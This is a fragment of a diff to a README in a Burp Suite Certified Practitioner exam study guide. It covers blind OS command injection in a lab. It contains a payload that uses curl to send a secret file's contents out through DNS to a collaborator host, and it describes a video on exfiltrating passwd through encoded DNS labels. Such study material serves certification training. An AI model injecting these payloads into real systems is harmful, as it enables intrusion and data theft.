botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ||$(curl $(cat /home/carlos/secret).COLLABORATOR.com)||
 ```

->In this youTube video [Leet Cipher](https://youtu.be/o7oVWXw4t5E) show how to use blind command injection to exfiltration the contents of `passwd` from the target by first uploading bash script that Base64 and then Base58 encode the `passwd` file content, to strip special character not able to ex-filtrate with DNS label restrictions.
+>In this YouTube video [Leet Cipher](https://youtu.be/o7oVWXw4t5E) show how to use DNS rebinding with blind command injection to exfiltration the contents of `passwd` from the target by first uploading bash script that Base64 and then Base58 encode the `passwd` file content, to strip special character not able to ex-filtrate with DNS label restrictions.

 ![OS command injection](images/os-command-inject.png)